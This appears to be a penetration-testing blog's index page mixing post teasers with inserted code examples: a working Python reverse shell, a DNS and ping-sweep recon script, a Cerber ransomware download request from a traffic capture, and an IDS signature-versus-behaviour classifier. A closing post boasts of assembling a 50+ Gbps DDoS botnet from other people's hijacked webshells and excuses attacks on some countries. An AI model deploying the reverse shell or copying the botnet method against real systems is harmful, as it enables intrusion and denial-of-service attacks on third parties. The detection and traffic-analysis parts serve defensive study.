Penetration Testing Red Team Reverse Shell Cheat Sheet

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. A reverse shell has the target connect out to a listener you control, which usually gets through NAT and inbound-only firewall rules where a bound port you must reach from outside does not. This page deals with the former. Your options for creating a reverse shell are limited … Read more Penetration Testing Red Team Reverse Shell Cheat Sheet
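The mechanism behind the one-liners such cheat sheets collect, as an added example that is not part of the cheat sheet itself: the victim side connects out, points stdin/stdout/stderr at the socket and execs /bin/sh, while the listener side accepts the call-back and drives the shell. Everything runs on 127.0.0.1 with a forked child standing in for the compromised host; the listening port is picked by the OS, and a POSIX /bin/sh is assumed.

```python
"""Reverse shell round-trip on the loopback interface (added example).

The forked child plays the compromised host: it connects back to the
listener, dup2()s the socket over fd 0/1/2 and execs /bin/sh, which is
exactly what the python/bash/nc one-liners do. Assumes a POSIX /bin/sh.
"""
import os
import socket


def reverse_shell(host: str, port: int) -> None:
    """Victim side: connect out, then let /bin/sh read and write the socket."""
    s = socket.create_connection((host, port))
    for fd in (0, 1, 2):                 # stdin, stdout, stderr -> the socket
        os.dup2(s.fileno(), fd)
    os.execv("/bin/sh", ["/bin/sh"])     # replaces this process; no -i, no prompt


def start_listener(bind: str = "127.0.0.1", port: int = 0):
    """Attacker side: listen and return (socket, bound port); port=0 lets the OS pick."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def run_through_reverse_shell(command: str, timeout: float = 10.0) -> str:
    """Run `command` on a forked 'victim' that calls back to us; return its output."""
    srv, port = start_listener()
    pid = os.fork()
    if pid == 0:                         # child = the compromised host
        srv.close()
        try:
            reverse_shell("127.0.0.1", port)
        finally:
            os._exit(1)                  # only reached if connect or exec failed
    conn, _ = srv.accept()               # the call-back arrives here
    srv.close()
    conn.settimeout(timeout)
    conn.sendall((command + "\n").encode())
    conn.shutdown(socket.SHUT_WR)        # EOF on the shell's stdin: run, then exit
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    os.waitpid(pid, 0)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(run_through_reverse_shell("id; uname -a"))
```

Nothing here is encrypted or authenticated: the command and its output cross the wire in clear text, which is why on an engagement the listener usually sits on a port that egress filtering already allows (80 or 443), and why, from the defender's side, an outbound connection from a host with a shell's file descriptors attached to the socket is exactly what process and network telemetry should flag.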



Are your printers secure? Cyber Security Video how Hackers are hacking Printers and Backdooring them

Watch this hacker find an unsuspecting target, a PRINTER, and compromise it using the web admin portal, load tools onto the printer to further compromise printers, and use a DDoS tool from the printer. On most assessments that I have been on, and through consulting, I have made it a priority to print a … Read more Are your printers secure? Cyber Security Video how Hackers are hacking Printers and Backdooring them



Penetration Testing Reconnaissance Command Line Tricks: Dig, Mass Domain Resolution, Ping Sweeping

Here are some simple command line tricks to help while doing recon on your target network/host. The first is a simple way to automatically resolve domain names; it can be wrapped in a for loop to resolve a massive list of domain names, and you can also add a cronjob that writes an .out file if you want to track … Read more Penetration Testing Reconnaissance Command Line Tricks: Dig, Mass Domain Resolution, Ping Sweeping
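The same three tricks (mass name resolution, expanding a block into host addresses, and a parallel ping sweep) collected into one script, as an added example rather than the post's own commands. It assumes a Linux iputils `ping` (the `-c` and `-W` flags), an IPv4 network, and it keeps unresolvable names in the output as UNRESOLVED so successive runs (for instance from cron into a dated .out file) can be diffed.

```python
"""Mass DNS resolution and ping sweep helpers (added example, not the post's own).

Assumptions: IPv4 targets, a `ping` that accepts -c and -W (Linux iputils; the
Windows and BSD flags differ), and that misses should stay in the output rather
than be dropped, so two runs can be compared.
"""
import ipaddress
import socket
import subprocess
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, List


def resolve_many(domains: Iterable[str], workers: int = 32) -> Dict[str, List[str]]:
    """Resolve each name to its IPv4 addresses; a miss yields an empty list.

    The parallel equivalent of `for d in $(cat list); do dig +short $d; done`."""
    def one(name: str) -> List[str]:
        try:
            _, _, addrs = socket.gethostbyname_ex(name)
            return sorted(set(addrs))
        except (OSError, UnicodeError):   # gaierror/herror: NXDOMAIN, timeout, bad label
            return []
    names = []
    for d in domains:
        d = d.strip()
        if d and not d.startswith("#"):   # blank lines and comments in the list file
            names.append(d)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(names, pool.map(one, names)))


def hosts_in(cidr: str) -> List[str]:
    """Expand a CIDR block into host addresses (network and broadcast excluded)."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


def ping_sweep(cidr: str, workers: int = 64, timeout_s: int = 1) -> List[str]:
    """Return the hosts that answer one ICMP echo within timeout_s seconds."""
    def alive(ip: str) -> bool:
        r = subprocess.run(["ping", "-c", "1", "-W", str(timeout_s), ip],
                           stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return r.returncode == 0
    targets = hosts_in(cidr)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return [ip for ip, up in zip(targets, pool.map(alive, targets)) if up]


def format_report(resolved: Dict[str, List[str]]) -> str:
    """One `name<TAB>ip,ip` line per domain, UNRESOLVED for misses; diff-friendly."""
    return "\n".join(f"{n}\t{','.join(a) if a else 'UNRESOLVED'}"
                     for n, a in resolved.items())


if __name__ == "__main__":
    import sys
    # usage: python recon.py domains.txt 192.168.1.0/24 > recon.$(date +%F).out
    with open(sys.argv[1]) as fh:
        print(format_report(resolve_many(fh)))
    if len(sys.argv) > 2:
        print("\n".join(ping_sweep(sys.argv[2])))
```

Hosts that drop ICMP will not show up in the sweep; on a segmented network treat the sweep as a lower bound and follow it with a TCP probe of a few common ports before concluding an address is unused.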



BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis

(PCAP and binary samples available with their usual password and location) Bro and Snort are completely different types of applications, although they are commonly compared against one another. From a network security standpoint, Snort can’t do much to detect new malware variants, obfuscation TTPs and other non-low-hanging fruit for which we haven’t yet created a signature. … Read more BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis



Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top was NX (NXDOMAIN) and not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@……..fH……P.n……P…….
GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; … Read more Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE
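To make the Snort-versus-Bro point from the Locky post concrete, using the Cerber request above as the input, here is an added example (not code from either post): one request is checked against a fixed byte signature of the kind a Snort `content:` match carries, and against a few protocol-level indicators of the kind a Bro script can evaluate from http.log fields. Renaming the payload defeats the first and not the second. The request text is constructed from the excerpt: the URI, the Accept and Accept-Language headers, the Mozilla/4.0 prefix and the 72.167.232.152 destination are from the page; the rest of the User-Agent and the Host and Connection headers are assumed, and the signature string is illustrative, not a published rule.

```python
"""Signature hit versus behavioural indicators on one HTTP request (added example).

SAMPLE_REQUEST is constructed from the Cerber traffic excerpt; header values
marked 'assumed' are not on the page. SIGNATURE_URI stands in for the bytes a
Snort content: option would carry and is not a real Snort rule.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SAMPLE_REQUEST = (
    "GET //up1/1/4fv3b5.exe HTTP/1.1\r\n"
    "Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\r\n"
    "Accept-Language: en-us\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\r\n"  # tail assumed
    "Host: 72.167.232.152\r\n"                                            # assumed header
    "Connection: Keep-Alive\r\n\r\n"                                      # assumed header
)

# The only thing a content signature knows: these exact bytes in the URI.
SIGNATURE_URI = "/up1/1/4fv3b5.exe"


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: Dict[str, str]


def parse_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.x request-line plus header parser (bodies ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, headers)


def signature_match(req: HttpRequest) -> bool:
    """Snort-style: fires only when the known bytes are present in the URI."""
    return SIGNATURE_URI in req.uri


def behaviour_indicators(req: HttpRequest) -> List[str]:
    """Bro-style: describe what the request does, independent of the file name."""
    hits = []
    if re.search(r"\.(exe|dll|scr)(\?|$)", req.uri, re.I):
        hits.append("executable requested over plain HTTP")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", req.headers.get("host", "")):
        hits.append("Host header is a bare IP address")
    if req.headers.get("user-agent", "").startswith("Mozilla/4.0 (compatible; MSIE"):
        hits.append("legacy MSIE user-agent string")
    if req.uri.startswith("//"):
        hits.append("doubled leading slash in path")
    return hits


def behaviour_match(req: HttpRequest, min_hits: int = 3) -> bool:
    """Alert when enough independent indicators line up on one request."""
    return len(behaviour_indicators(req)) >= min_hits


def classify(raw: str) -> Dict[str, object]:
    req = parse_request(raw)
    return {"uri": req.uri, "signature": signature_match(req),
            "indicators": behaviour_indicators(req), "behaviour": behaviour_match(req)}


if __name__ == "__main__":
    print(classify(SAMPLE_REQUEST))
    # Same campaign, renamed payload: the signature goes quiet, the behaviour does not.
    print(classify(SAMPLE_REQUEST.replace("4fv3b5.exe", "k2r7xq.exe")))
```

The behavioural side has the opposite failure mode: legacy MSIE user agents and direct-to-IP downloads still occur in legitimate enterprise traffic, so the threshold needs tuning against your own baseline, and in Bro the MIME type recorded in files.log is a stronger anchor than the extension in the URI, since the payload name is the attacker's to choose.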



CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis

Cerber ransomware has been one of the most prolific crimeware botnets to have arisen; it is currently generating an estimated $2.5 million a year and rising. Once infected, your content is encrypted and held for ransom, as the name implies. You will see an image pop up with instructions on how to reclaim your data … Read more CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis



********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO, AS YOU WILL MOST LIKELY END UP IN JAIL. I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – I TAKE NO RESPONSIBILITY FOR ANYTHING ILLEGAL YOU ARE ABLE TO DO WITH THIS INFORMATION *******

So, basically, I did some research on DoS webshells and quickly found some popular ones such as phpDOS, Grenshell and a few other less popular ones labeled *PRIVATE* *NOT FOR RELEASE*, which obviously didn’t turn out well. Additionally, kiddies are arrogant and lazy, so I wanted to do searches for file names that ended with or included “ddos”, “dos”, “attack”, “stresser”, “packet”, etc. with *.php|.asp|.jsp|.cfm extensions. But why stop there? I also wanted to include in-text strings such as “Start the attack”, “Flood victim”, “DoS Victim”, “Victim IP”, etc. So, armed with some information, it was time to see if I could build a botnet: using a custom python script and multiple TOR nodes through a VPN, I could link all the hacked shells and launch a single DDoS at any target I desired. So, just to prove my point, here are a few screen shots. I was able to locate 178 available bots and, judging by their combined uplinks, they should deliver well over 50gbs/sec – maybe more. It took me less than 4 hours to build a botnet and be able to control it without hacking a thing. The internet is broken; kiddies can repeat the same type of actions and take down large networks with ease.

Category: DoS, DDoS, DrDoS

*FOR RESEARCH* I Built a 50gbs+/sec DDoS Net using just GOOGLE Without Hacking Anything
